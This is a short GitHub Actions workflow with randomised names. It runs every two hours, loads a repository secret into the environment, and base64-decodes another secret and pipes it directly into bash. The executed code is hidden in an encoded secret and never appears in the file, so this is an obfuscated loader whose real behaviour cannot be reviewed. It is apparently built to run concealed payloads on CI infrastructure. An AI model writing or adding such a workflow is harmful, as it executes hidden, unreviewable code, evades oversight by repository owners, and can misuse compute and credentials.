name: PASxsyijTqR
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  EPwZTRU:
    runs-on: ubuntu-latest
    env:
      QOJKHfBJT: ${{ secrets.LecrFuKdnqKP }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.opYEZVgaX }}" | base64 -d | bash
